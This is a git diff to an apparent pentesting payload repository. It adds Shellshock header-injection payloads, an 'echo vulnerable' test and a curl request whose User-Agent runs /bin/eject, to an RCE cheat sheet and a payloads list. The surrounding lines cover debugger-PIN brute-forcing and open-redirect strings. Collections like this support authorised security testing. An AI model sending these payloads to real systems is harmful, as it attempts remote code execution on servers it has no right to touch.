diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md
index 7307e3e..66d39cf 100644
--- a/cheatsheets/rce.md
+++ b/cheatsheets/rce.md
@@ -8,4 +8,14 @@ Find somewhere where user input can be supplied and submit the following string
 strіng
 ```
 
-If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
\ No newline at end of file
+If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
+
+**Shellshock Bug**
+
+```bash
+() { :;}; echo vulnerable
+```
+
+```zsh
+curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
+```
\ No newline at end of file
diff --git a/payloads.txt b/payloads.txt
index e6b5015..37931af 100644
--- a/payloads.txt
+++ b/payloads.txt
@@ -57,6 +57,10 @@ http://[::]
 
 strіng
 
+() { :;}; echo vulnerable
+
+curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
+
 /%09/google.com
 
 /%5cgoogle.com